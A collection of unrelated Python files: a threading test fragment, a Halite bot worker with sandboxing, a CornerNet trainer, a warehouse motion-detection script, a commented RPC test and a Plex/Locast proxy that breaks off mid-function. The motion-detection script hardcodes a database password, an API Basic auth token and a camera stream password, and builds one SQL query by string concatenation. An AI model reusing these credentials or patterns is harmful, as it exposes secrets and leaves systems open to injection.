self.assertEqual(len(lines), 2, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
def test_name(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.name)
print(t.getName())
print(t.get_name())
t.name = 'foo'
print(t.name)
print(t.getName())
print(t.get_name())
t.setName('bar')
print(t.name)
print(t.getName())
print(t.get_name())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 10, "\n".join(lines))
for i in range(0, 3):
self.assertEqual(lines[i], "GreenThread-1", lines[i])
for i in range(3, 6):
self.assertEqual(lines[i], "foo", lines[i])
for i in range(6, 9):
self.assertEqual(lines[i], "bar", lines[i])
def test_ident(self):
self.write_to_tempfile("newmod", self.prologue + """
print(id(t._g))
print(t.ident)
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], lines[1])
def test_is_alive(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_alive())
print(t.isAlive())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_is_daemon(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_daemon())
print(t.isDaemon())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_patcher_existing_locks_early():
tests.run_isolated('patcher_existing_locks_early.py')
def test_patcher_existing_locks_late():
tests.run_isolated('patcher_existing_locks_late.py')
def test_patcher_existing_locks_locked():
tests.run_isolated('patcher_existing_locks_locked.py')
@tests.skip_if_CRLock_exist
def test_patcher_existing_locks_unlocked():
tests.run_isolated('patcher_existing_locks_unlocked.py')
def test_importlib_lock():
tests.run_isolated('patcher_importlib_lock.py')
def test_threading_condition():
tests.run_isolated('patcher_threading_condition.py')
def test_threading_join():
tests.run_isolated('patcher_threading_join.py')
def test_socketserver_selectors():
tests.run_isolated('patcher_socketserver_selectors.py')
def test_blocking_select_methods_are_deleted():
tests.run_isolated('patcher_blocking_select_methods_are_deleted.py')
def test_regular_file_readall():
tests.run_isolated('regular_file_readall.py')
def test_threading_current():
tests.run_isolated('patcher_threading_current.py')
def test_threadpoolexecutor():
tests.run_isolated('patcher_threadpoolexecutor.py')
|
worker.py
|
import argparse
import copy
import os
import sys
import os.path
import glob
import json
import random
import shutil
import subprocess
import tempfile
import traceback
import logging
import uuid
import socket
from time import sleep, gmtime, strftime
import datetime
import threading
from flask import Flask
import archive
import backend
import compiler
import util
# Flask start
app = Flask(__name__)
# Log it real good
LOG_FILENAME = "worker-log-{}.data".format(uuid.uuid4())
# Constraints on # and size of log files read from bots
MAX_LOG_FILES = 1
MAX_LOG_FILE_SIZE = 50 * 1024 # 50 KiB
# Used to ensure system is running (watchdog timer)
TIME = datetime.datetime.now()
TIME_THRESHOLD = 60 * 18 # 18 mins in s
# Used by Watchdog timer to keep time
LOCK = threading.Lock()
# Where to create temporary directories
TEMP_DIR = os.getcwd()
# The game environment executable.
ENVIRONMENT = "halite"
# The script used to start the bot. This is either user-provided or
# created by compile.py.
RUNFILE = "run.sh"
# The command used to run the bot. On the outside is a cgroup limiting CPU
# and memory access. On the inside, we run the bot as a user so that it may
# not overwrite files. The worker image has a built-in iptables rule denying
# network access to this user as well.
BOT_COMMAND = "cgexec -g cpu,memory,devices,cpuset:{cgroup} sudo -Hiu {bot_user} bash -c 'cd \"{bot_dir}\" && ./{runfile}'"
COMPILE_ERROR_MESSAGE = """
Your bot caused unexpected behavior in our servers. If you cannot figure out
why this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
UPLOAD_ERROR_MESSAGE = """
We had some trouble uploading your bot. If you cannot figure out why
this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
class OndemandCompileError(Exception):
"""
Error for when compilation fails before an ondemand game.
"""
def __init__(self, language, log):
self.language = language
self.log = log
def makePath(path):
"""Deletes anything residing at path, creates path, and chmods the directory"""
if os.path.exists(path):
shutil.rmtree(path)
os.makedirs(path)
os.chmod(path, 0o777)
def give_ownership(top_dir, group, dir_perms):
"""Give ownership of everything in a directory to a given group."""
for dirpath, _, filenames in os.walk(top_dir):
shutil.chown(dirpath, group=group)
os.chmod(dirpath, dir_perms)
for filename in filenames:
shutil.chown(os.path.join(dirpath, filename), group=group)
os.chmod(os.path.join(dirpath, filename), dir_perms)
def rm_as_user(user, directory):
"""Remove a directory tree as the specified user."""
subprocess.call(["sudo", "-H", "-u", user, "-s", "rm", "-rf", directory],
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL)
def executeCompileTask(user_id, bot_id, backend):
"""Downloads and compiles a bot. Posts the compiled bot files to the manager."""
logging.debug("Compiling a bot with userID %s\n" % str(user_id))
errors = []
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
try:
bot_path = backend.storeBotLocally(user_id, bot_id, temp_dir,
is_compile=True)
archive.unpack(bot_path)
# Make sure things are in the top-level directory
while len([
name for name in os.listdir(temp_dir)
if os.path.isfile(os.path.join(temp_dir, name))
]) == 0 and len(glob.glob(os.path.join(temp_dir, "*"))) == 1:
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as bufferFolder:
singleFolder = glob.glob(os.path.join(temp_dir, "*"))[0]
for filename in os.listdir(singleFolder):
shutil.move(os.path.join(singleFolder, filename), bufferFolder)
os.rmdir(singleFolder)
for filename in os.listdir(bufferFolder):
shutil.move(os.path.join(bufferFolder, filename), temp_dir)
# Context manager takes care of buffer folder
# Delete any symlinks
subprocess.call(["find", temp_dir, "-type", "l", "-delete"])
# Give the compilation user access
os.chmod(temp_dir, 0o755)
# User needs to be able to write to the directory and create files
give_ownership(temp_dir, "bots", 0o2770)
# Reset cwd before compilation, in case it was in a
# deleted temporary folder
os.chdir(os.path.dirname(os.path.realpath(sys.argv[0])))
language, more_errors = compiler.compile_anything(temp_dir)
didCompile = more_errors is None
if more_errors:
errors.extend(more_errors)
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()] + errors
didCompile = False
try:
if didCompile:
logging.debug("Bot did compile\n")
# Make things group-readable
subprocess.call([
"sudo", "-H", "-u", "bot_compilation", "-s",
"chmod", "-R", "g+r", temp_dir,
], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
archive_path = os.path.join(temp_dir, str(user_id)+".zip")
archive.zipFolder(temp_dir, archive_path)
backend.storeBotRemotely(user_id, bot_id, archive_path)
else:
logging.debug("Bot did not compile\n")
logging.debug("Bot errors %s\n" % str(errors))
backend.compileResult(user_id, bot_id, didCompile, language,
errors=(None if didCompile else "\n".join(errors)))
except Exception as e:
logging.error("Bot did not upload", e)
errors.append(UPLOAD_ERROR_MESSAGE + traceback.format_exc())
backend.compileResult(user_id, bot_id, False, language,
errors="\n".join(errors))
finally:
# Remove files as bot user (Python will clean up tempdir, but we don't
# necessarily have permissions to clean up files)
rm_as_user("bot_compilation", temp_dir)
def setupParticipant(user_index, user, temp_dir):
"""
Download and set up the bot for a game participant.
"""
# Include username to deal with duplicate bots
bot_dir = "{}_{}_{}".format(user["user_id"], user["bot_id"], user["username"])
bot_dir = os.path.join(temp_dir, bot_dir)
os.mkdir(bot_dir)
archive.unpack(backend.storeBotLocally(user["user_id"],
user["bot_id"], bot_dir))
if user.get("requires_compilation"):
compile_dir = bot_dir + '_compile'
try:
# Move to temp directory to avoid permission problems
# (can't chown files created by compile user back to us)
shutil.move(bot_dir, compile_dir)
# Give the compilation user access
os.chmod(compile_dir, 0o2755)
# User needs to be able to write to the directory
give_ownership(compile_dir, "bots", 0o2774)
language, errors = compiler.compile_anything(compile_dir)
didCompile = errors is None
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()] + errors
didCompile = False
if not didCompile:
# Abort and upload an error log
rm_as_user("bot_compilation", compile_dir)
raise OndemandCompileError(language, '\n'.join(errors))
# Move back to original directory
try:
shutil.copytree(compile_dir, bot_dir)
except shutil.Error as e:
logging.error("Could not compile bot ondemand", e)
rm_as_user("bot_compilation", compile_dir)
# Make the start script executable
os.chmod(os.path.join(bot_dir, RUNFILE), 0o755)
# Give the bot user ownership of their directory
# We should set up each user's default group as a group that the
# worker is also a part of. Then we always have access to their
# files, but not vice versa.
# https://superuser.com/questions/102253/how-to-make-files-created-in-a-directory-owned-by-directory-group
bot_user = "bot_{}".format(user_index)
bot_group = "bots_{}".format(user_index)
bot_cgroup = "bot_{}".format(user_index)
# We want 775 so that the bot can create files still; leading 2
# is equivalent to g+s which forces new files to be owned by the
# group
give_ownership(bot_dir, bot_group, 0o2775)
bot_command = BOT_COMMAND.format(
cgroup=bot_cgroup,
bot_dir=bot_dir,
bot_group=bot_group,
bot_user=bot_user,
runfile=RUNFILE,
)
bot_name = "{} v{}".format(user["username"], user["version_number"])
return bot_command, bot_name, bot_dir
def runGame(environment_parameters, users, offset=0):
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
shutil.copy(ENVIRONMENT, os.path.join(temp_dir, ENVIRONMENT))
command = [
"./" + ENVIRONMENT,
"--results-as-json",
]
for key, value in environment_parameters.items():
command.append("--{}".format(key))
if value:
command.append("{}".format(value))
# Make sure bots have access to the temp dir as a whole
# Otherwise, Python can't import modules from the bot dir
# Based on strace, Python lstat()s the full dir path to the dir it's
# in, and fails when it tries to lstat the temp dir, which this
# fixes
os.chmod(temp_dir, 0o755)
for user_index, user in enumerate(users):
bot_command, bot_name, bot_dir = setupParticipant(user_index + offset, user, temp_dir)
command.append(bot_command)
command.append("-o")
command.append(bot_name)
user['bot_dir'] = bot_dir
logging.debug("Run game command %s\n" % command)
logging.debug(command)
logging.debug("Waiting for game output...\n")
lines = subprocess.Popen(
command,
stdout=subprocess.PIPE).stdout.read().decode('utf-8').split('\n')
logging.debug("\n-----Here is game output: -----")
logging.debug("\n".join(lines))
logging.debug("--------------------------------\n")
# tempdir will automatically be cleaned up, but we need to do things
# manually because the bot might have made files it owns
for user_index, user in enumerate(users):
# keep any bot logs
user['bot_logs'] = ''
log_files_read = 0
for filename in os.listdir(user['bot_dir']):
try:
_, ext = os.path.splitext(filename)
if ext.lower() == '.log':
log_files_read += 1
user['bot_logs'] += '===== Log file {}\n'.format(filename)
with open(os.path.join(user['bot_dir'], filename)) as logfile:
user['bot_logs'] += logfile.read(MAX_LOG_FILE_SIZE)
user['bot_logs'] += '\n===== End of log {}\n'.format(filename)
except Exception:
# Ignore log and move on if we fail
pass
if log_files_read >= MAX_LOG_FILES:
break
bot_user = "bot_{}".format(user_index + offset)
rm_as_user(bot_user, temp_dir)
# The processes won't necessarily be automatically cleaned up, so
# let's do it ourselves
util.kill_processes_as(bot_user)
return lines
def parseGameOutput(output, users):
users = copy.deepcopy(users)
logging.debug(output)
result = json.loads(output)
for player_tag, stats in result["stats"].items():
player_tag = int(player_tag)
users[player_tag]["player_tag"] = player_tag
users[player_tag]["rank"] = stats["rank"]
users[player_tag]["timed_out"] = False
users[player_tag]["log_name"] = None
for player_tag, error_log in result["error_logs"].items():
numeric_player_tag = int(player_tag)
users[numeric_player_tag]["timed_out"] = result["terminated"].get(player_tag, False)
users[numeric_player_tag]["log_name"] = os.path.basename(error_log)
return users, result
def executeGameTask(environment_parameters, users, extra_metadata, gameResult):
"""Downloads compiled bots, runs a game, and posts the results of the game"""
logging.debug("Running game with parameters {}\n".format(environment_parameters))
logging.debug("Users objects {}\n".format(users))
logging.debug("Extra metadata {}\n".format(extra_metadata))
raw_output = '\n'.join(runGame(
environment_parameters, users,
extra_metadata.get("offset", 0)))
users, parsed_output = parseGameOutput(raw_output, users)
gameResult(users, parsed_output, extra_metadata)
# Clean up game logs and replays
filelist = glob.glob("*.log")
for f in filelist:
os.remove(f)
os.remove(parsed_output["replay"])
# Make sure game processes exit
subprocess.run(["pkill", "--signal", "9", "-f", "cgexec"])
def _set_logging():
logging.basicConfig(filename=LOG_FILENAME, level=logging.INFO)
logging.getLogger('werkzeug').setLevel(logging.ERROR)
logging.getLogger('requests').setLevel(logging.CRITICAL)
outLog = logging.StreamHandler(sys.stdout)
outLog.setLevel(logging.DEBUG)
outLog.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s]: %(message)s'))
logging.getLogger().addHandler(outLog)
def set_time():
global LOCK
with LOCK:
global TIME
TIME = datetime.datetime.now()
logging.info("Setting time to {}".format(TIME))
def is_time_up_to_date():
global LOCK
with LOCK:
global TIME
current_time = datetime.datetime.now()
logging.info("TIME DIFFERENCE: {}".format((current_time - TIME).total_seconds()))
if (current_time - TIME).total_seconds() > TIME_THRESHOLD:
return False
return True
@app.route('/health_check')
def health_check():
if is_time_up_to_date():
return "Alive", 200
else:
return "Dead. Last alive at {}".format(TIME), 503
def main(args):
_set_logging()
logging.info("Starting up worker at {}".format(socket.gethostname()))
threading.Thread(target=app.run, kwargs={'host':'0.0.0.0', 'port':5001, 'threaded':True}).start()
while True:
set_time()
try:
logging.debug("\n\n\nQuerying for new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
task = backend.getTask(args.task_type)
if "type" in task and (task["type"] == "compile" or task["type"] == "game"):
logging.debug("Got new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
logging.debug("Task object %s\n" % str(task))
if task["type"] == "compile":
logging.debug("Running a compilation task...\n")
executeCompileTask(task["user"], task["bot"], backend)
else:
logging.debug("Running a game task...\n")
executeGameTask(task.get("environment_parameters", {}),
task["users"], {
"challenge": task.get("challenge"),
}, backend.gameResult)
elif task.get("type") == "ondemand":
environment_params = task["environment_parameters"]
extra_metadata = {
"task_user_id": task["task_user_id"],
"offset": int(args.user_offset),
}
try:
executeGameTask(environment_params,
task["users"],
extra_metadata,
backend.ondemandResult)
except OndemandCompileError as e:
backend.ondemandError(
task["users"],
extra_metadata,
e.language, e.log
)
else:
logging.debug("No task available at time %s (GMT). Sleeping...\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
sleep(random.randint(1, 4))
except Exception as e:
logging.exception("Error on get task %s\n" % str(e))
logging.debug("Sleeping...\n")
sleep(random.randint(1, 4))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--task-type", default="task")
parser.add_argument("--user-offset", default=0)
args = parser.parse_args()
main(args)
|
train_ensemble.py
|
#!/usr/bin/env python
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
from socket import error as SocketError
import errno
import re
from tqdm import tqdm
from utils import stdout_to_tqdm
from config import system_configs
from nnet.py_factory import NetworkFactory
from azureml.core.run import Run
from torch.multiprocessing import Process, Queue, Pool
from db.datasets import datasets
import time
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
parser = argparse.ArgumentParser(description="Train CornerNet")
parser.add_argument("--cfg_file", dest="cfg_file", help="config file", default="CornerNet", type=str)
parser.add_argument("--iter", dest="start_iter", help="train at iteration i", default=0, type=int)
parser.add_argument("--threads", dest="threads", default=1, type=int)
parser.add_argument('--cache_path', dest="cache_path", type=str)
parser.add_argument("--data_dir", dest="data_dir", default="./data", type=str)
parser.add_argument("--split", dest="split", default=0, type=int)
args = parser.parse_args()
return args
def prefetch_data(db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(db, ind, data_aug=data_aug)
#print("PRFETCH1",data)
#print("PRFETCH2",ind)
queue.put(data)
except Exception as e:
print('We met some errors!')
traceback.print_exc()
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
try:
data = data_queue.get()
data["xs"] = [x.pin_memory() for x in data["xs"]]
data["ys"] = [y.pin_memory() for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
except SocketError as e:
if e.errno != errno.ECONNRESET:
raise
pass
def init_parallel_jobs(dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def train(training_dbs, validation_db, start_iter=0, split=0):
learning_rate = system_configs.learning_rate
max_iteration = 50000
#max_iteration = system_configs.max_iter
pretrained_model = None
#pretrained_model = system_configs.pretrain
snapshot = system_configs.snapshot
val_iter = system_configs.val_iter
display = system_configs.display
decay_rate = system_configs.decay_rate
stepsize = system_configs.stepsize
val_ind = 0
print("building model...")
nnet = NetworkFactory(training_dbs[0])
# getting the size of each database
training_size = len(training_dbs[0].db_inds)
validation_size = len(validation_db.db_inds)
# queues storing data for training
training_queue = Queue(32)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(32)
# load data sampling function
data_file = "sample.{}".format(training_dbs[0].data)
sample_data = importlib.import_module(data_file).sample_data
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(training_dbs, training_queue, sample_data, True)
training_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
run = Run.get_context()
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("loading from pretrained model")
nnet.load_pretrained_params(pretrained_model)
if start_iter:
if start_iter == -1:
print("training starts from the latest iteration")
save_list = os.listdir(system_configs.snapshot_dir)
save_list.sort(reverse=True)
if len(save_list) > 0:
target_save = save_list[0]
start_iter = int(re.findall(r'\d+', target_save)[0])
learning_rate /= (decay_rate ** (start_iter // stepsize))
nnet.load_params(start_iter)
else:
start_iter = 0
nnet.set_lr(learning_rate)
print("training starts from iteration {} with learning_rate {}".format(start_iter + 1, learning_rate))
else:
nnet.set_lr(learning_rate)
print("training start...")
nnet.cuda()
nnet.train_mode()
if not os.path.exists('./outputs'):
os.makedirs('./outputs')
print('outputs file created')
else:
print(os.listdir('./outputs'))
error_count = 0
for iteration in tqdm(range(start_iter + 1, max_iteration + 1)):
try:
training = pinned_training_queue.get(block=True)
except:
print('Error when extracting data')
error_count += 1
if error_count > 10:
print('failed')
time.sleep(1)
break
continue
training_loss = nnet.train(**training)
if display and iteration % display == 0:
print("training loss at iteration {}: {}".format(iteration, training_loss.item()))
run.log('train_loss', training_loss.item())
if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
nnet.eval_mode()
validation, val_ind = sample_data(validation_db, val_ind, data_aug=False)
validation_loss = nnet.validate(**validation)
print("validation loss at iteration {}: {}".format(iteration, validation_loss.item()))
run.log('val_loss', validation_loss.item())
nnet.train_mode()
if iteration % 10000 == 0:
split_iter = str(split)+str(iteration)
file = os.path.join(system_configs.snapshot_dir, system_configs.snapshot_name + "_{}.pkl").format(split_iter)
nnet.save_params_split(file)
if iteration % stepsize == 0:
learning_rate /= decay_rate
nnet.set_lr(learning_rate)
# sending signal to kill the thread
training_pin_semaphore.release()
# terminating data fetching processes
for training_task in training_tasks:
training_task.terminate()
if __name__ == "__main__":
args = parse_args()
cfg_file = os.path.join(system_configs.config_dir, args.cfg_file + ".json")
with open(cfg_file, "r") as f:
configs = json.load(f)
configs["system"]["data_dir"] = args.data_dir
configs["system"]["cache_dir"] = args.cache_path
file_list_data = os.listdir(args.data_dir)
print(file_list_data)
configs["system"]["snapshot_name"] = args.cfg_file
system_configs.update_config(configs["system"])
train_split = system_configs.train_split
val_split = system_configs.val_split
print("loading all datasets...")
dataset = system_configs.dataset
# threads = max(torch.cuda.device_count() * 2, 4)
threads = args.threads
print("using {} threads".format(threads))
training_dbs = [datasets[dataset](configs["db"], train_split) for _ in range(threads)]
print("training_dbs",dir(training_dbs))
print(dataset)
validation_db = datasets[dataset](configs["db"], val_split)
print("system config...")
pprint.pprint(system_configs.full)
print("db config...")
pprint.pprint(training_dbs[0].configs)
split = args.split
print("len of db: {}".format(len(training_dbs[0].db_inds)))
train(training_dbs, validation_db, args.start_iter, split=split)
|
pyi.py
|
import tkinter as tk
import psycopg2
import pickle
import time, calendar, requests, datetime
try:
conn = psycopg2.connect(database="postgres", user="postgres", password="Contec123", host="10.10.100.120")
print("connected")
except:
print ("I am unable to connect to the database")
motions = []
stationMotions = {}
lastMotion = {}
import cv2
import threading
import schedule
def maintenance():
print("waiting...")
while True:
time.sleep(119)
cur =conn.cursor()
autoid = str("Select value from autoid WHERE id = 1 limit 1")
autoids = cur.execute(autoid)
autoids = cur.fetchall()
cur.close()
auditval = ''
for autoid in autoids:
last_Date_from = autoid[0].strip().split(' ')
auditval = autoid[0]
last_time = (int(datetime.datetime.strptime(auditval.strip()+',000', "%Y-%m-%d %H:%M:%S,%f").timestamp()))
last_time = last_time + 120
if int(time.time()) > int(last_time):
last_Date_to = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(last_time)))
last_Date_to = last_Date_to.split(' ')
if last_Date_from[0] != last_Date_to[0]:
date_send = last_Date_to[0]
date_from_time = "00:00:00"
date_to_time = last_Date_to[1]
else:
date_send = last_Date_from[0]
date_from_time = last_Date_from[1]
date_to_time = last_Date_to[1]
try:
response = requests.get('https://deepbluapi.gocontec.com/autoreceive/direct-shipments?_format=json&date='+date_send+'&s_time='+date_from_time+'&e_time='+date_to_time+'',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic QVVUT1JFQ0VJVkU6YXV0b0AxMjM='}
)
if response.status_code == 200:
data_time = []
if (response.content.decode("utf-8") != ""):
result = response.json()
s = 0
for value in result:
s = 1
data_time = value["Scan Timestamp"]
cur =conn.cursor()
cur.execute("INSERT INTO directshipping (scantime, station, operator, product, eventtype, shipid, errorcode, errormessage, siteid) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)",(value["Scan Timestamp"], value["Work Station ID"], value["Operator ID"], value["Product ID"], value["Event Type"], value["Shipment ID"], value["Error Code"], value["Error Message"], value["Site ID"]))
conn.commit()
cur.close()
upautoidlastValue = date_send +' '+date_to_time
print(upautoidlastValue)
cur =conn.cursor()
qry = str("Update autoid SET value = '"+upautoidlastValue+"' WHERE id = 1")
cur.execute(qry)
conn.commit()
cur.close()
except:
print("Unable to connect deepblu")
def job():
print("I'm working...")
cur =conn.cursor()
autoid = str("select * from test_loop(1)")
autoids = cur.execute(autoid)
conn.commit()
cur.close()
schedule.every().day.at("00:05").do(job)
def pendingrun():
while True:
schedule.run_pending()
time.sleep(1)
threading.Thread(target=maintenance, daemon=True).start()
threading.Thread(target=pendingrun, daemon=True).start()
def capture_motion(motion):
ts = int(time.time())
if len(motions) > 0:
if motion not in stationMotions:
stationMotions[motion] = 0
if motion not in lastMotion:
lastMotion[motion] = 0
if stationMotions[motion] < (ts-5):
cur =conn.cursor()
#print("INSERT INTO motions (area, timeadded, warehouse, station_type) VALUES (%s, %s, %s, %s)",(str(motion), ts, 1, 1 ))
cur.execute("INSERT INTO motions (area, timeadded, warehouse, station_type) VALUES (%s, %s, %s, %s)",(str(motion), ts, 1, 1 ))
conn.commit()
cur.close()
#print()
stationMotions[motion] = ts
# define a video capture object
vid = cv2.VideoCapture("rtsp://admin:3J7Bm!j@@10.10.153.21:8221/Streaming/Channels/102/picture?subtype=1")
day1 = 0
while(True):
# Capture the video frame
# by frame
ret, frame = vid.read()
frame = cv2.resize(frame, (1100, 700), interpolation=cv2.INTER_AREA)
if day1 == 0:
frame2 = frame
day1 = 1
diff = cv2.absdiff(frame,frame2)
diff_gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(diff_gray, (5, 5), 0)
_, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
dilated = cv2.dilate(thresh, None, iterations=3)
contours, _ = cv2.findContours(
dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
movementPoints = []
for contour in contours:
(x, y, w, h) = cv2.boundingRect(contour)
if cv2.contourArea(contour) < 200 and cv2.contourArea(contour) > 500:
continue
movementPoints.append([x, y])
cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 255, 0), 2)
cv2.putText(frame, "Status: {}".format('Movement'), (20, 30), cv2.FONT_HERSHEY_SIMPLEX,
1, (255, 0, 0), 3)
listStation = data = pickle.load(open("stationConfig.p", "rb"))
for station in listStation:
arrayassign = []
i = 0
for key in station['location']:
arrayassign.append(station['location'][key])
i = i + 1
i = 0
oldX = 0
oldY = 0
#print(arrayassign)
for key in arrayassign:
if i != 0:
cv2.rectangle(frame, (oldX, oldY),
(key[0], key[1]), (0, 255, 0),
thickness=1)
for point in movementPoints:
#print(station['name'])
#print(str(point[0])+'>'+str(oldX)+' and '+str(point[0])+'>'+str(oldX)+' or '+str(point[1])+'<'+str(key[0])+'and'+str(point[1])+'>'+str(key[1]))
if (point[0] >= oldX and point[1] > oldY) and (point[0] <= key[0] and point[1] < key[1]):
motions.append({station['name']: time.time()})
capture_motion(station['name'])
i = i + 1
oldX = key[0]
oldY = key[1]
ret, frame2 = vid.read()
if ret:
frame2 = cv2.resize(frame2, (1100, 700), interpolation=cv2.INTER_AREA)
else:
frame2 = frame
cv2.imshow("opencv", frame2)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# After the loop release the cap object
vid.release()
# Destroy all the windows
cv2.destroyAllWindows()
|
client_server_test.py
|
# #
# # @rpc.client()
# # class PingClientStub(RPCClient):
# #
# # @rpc.method(PingMessageRequest, PingMessageResponse)
# # def ping(self, ping_message):
# # pass
# #
# # @rpc.server()
# # class PingServer(RPCServer):
# #
# # @rpc.handler(PingMessageRequest, PingMessageResponse)
# # def ping(self, ping_message):
# #
# # return pong_message
# #
# #
# # channel = RPCChannel(host, port)
# # client = RPCClient(channel)
# # client.ping(ping_message)
# #
# #
# # server = RPCServer(port)
# # server.Loop()
#
# import threading
# import time
#
# from proto.message_descriptor import MessageDescriptor
# from proto.field_descriptor import FieldDescriptor
# from proto.field_type import FieldType
# from proto.message import Message
# from proto.serializable import serializable
#
# from proto.rpc._method_descriptor import _MethodDescriptor
# from proto.rpc.server.rpcserver import RpcServer, service, handler
# from proto.rpc.client.rpcchannel import RpcChannel
# from proto.rpc.service.rpcservice_stub import RpcServiceStub
#
# class TestMessageDescriptor(MessageDescriptor):
# def __init__(self):
# super(self.__class__, self).__init__('TestMessage', fields=[
# FieldDescriptor('int1', FieldType.Int8)
# ])
#
# @serializable(TestMessageDescriptor())
# class TestMessage(Message):
# def __init__(self, int1=0):
# self.int1 = int1
#
# @service()
# class TestRpcService(RpcServiceStub):
#
# @handler(TestMessage, None)
# def TestMethod(self):
# pass
#
# def Dispatch(self, method_descriptor, message):
# print '%r' % message.int1
#
# self.Shutdown()
#
# def start_server():
# server = TestRPCServer(port=8081, service=)
# server.loop()
#
# server_thread = threading.Thread(target=start_server)
# server_thread.start()
#
# time.sleep(5)
#
# message = TestMessage(10)
# channel = RPCChannel('localhost', 8081)
# channel.call_method(_MethodDescriptor('TestMethod', message.__class__), message)
#
# server_thread.join()
|
main.py
|
import subprocess, os, sys, random, threading, socket, time, SocketServer
import SSDPServer
import LocastService
from templates import templates
from functools import partial
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from multiprocessing import Process
def clean_exit():
sys.stderr.flush()
sys.stdout.flush()
os._exit(0)
# with help from https://www.acmesystems.it/python_http
# and https://stackoverflow.com/questions/21631799/how-can-i-pass-parameters-to-a-requesthandler
class PlexHttpHandler(BaseHTTPRequestHandler):
# using class variables since this should only be set once
address = ""
port = ""
uuid = ""
templates = {}
station_scan = False
station_list = {}
local_locast = None
def do_GET(self):
base_url = self.address + ':' + self.port
# paths and logic mostly pulled from telly:routes.go: https://github.com/tellytv/telly
if (self.path == '/') or (self.path == '/device.xml'):
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
self.wfile.write(self.templates['xmlDiscover'].format(self.uuid, base_url))
elif self.path == '/discover.json':
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
self.wfile.write(self.templates['jsonDiscover'].format(self.uuid, base_url))
elif self.path == '/lineup_status.json':
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
if self.station_scan:
self.wfile.write(self.templates['jsonLineupStatus'])
else:
self.wfile.write(self.templates['jsonLineupComplete'])
elif self.path == '/lineup.json': # TODO
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
returnJSON = ''
for index, station_item in enumerate(self.station_list):
returnJSON = returnJSON + self.templates['jsonLineupItem'].format(station_item['channel'], station_item['name'], base_url + '/watch/' + str(station_item['id']))
if (index + 1) != len(self.station_list):
returnJSON = returnJSON + ','
returnJSON = "[" + returnJSON + "]"
self.wfile.write(returnJSON)
elif self.path == '/lineup.xml': # TODO
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
returnXML = ''
for station_item in self.station_list:
returnXML = returnXML + self.templates['xmlLineupItem'].format(station_item['channel'], station_item['name'], base_url + '/watch/' + str(station_item['id']))
returnXML = "<Lineup>" + returnXML + "</Lineup>"
self.wfile.write(returnXML)
elif self.path.startswith('/watch'):
channelId = self.path.replace('/watch/', '')
channelUri = self.local_locast.get_station_stream_uri(channelId)
self.send_response(200)
self.send_header('Content-type','video/mpeg; codecs="avc1.4D401E')
self.end_headers()
ffmpeg_proc = subprocess.Popen(["ffmpeg", "-i", channelUri, "-codec", "copy", "-f", "mpegts", "pipe:1"], stdout=subprocess.PIPE)
# get initial videodata. if that works, then keep grabbing it
videoData = ffmpeg_proc.stdout.read(1024000)
while True:
if not videoData:
break
else:
# from https://stackoverflow.com/questions/9932332
try:
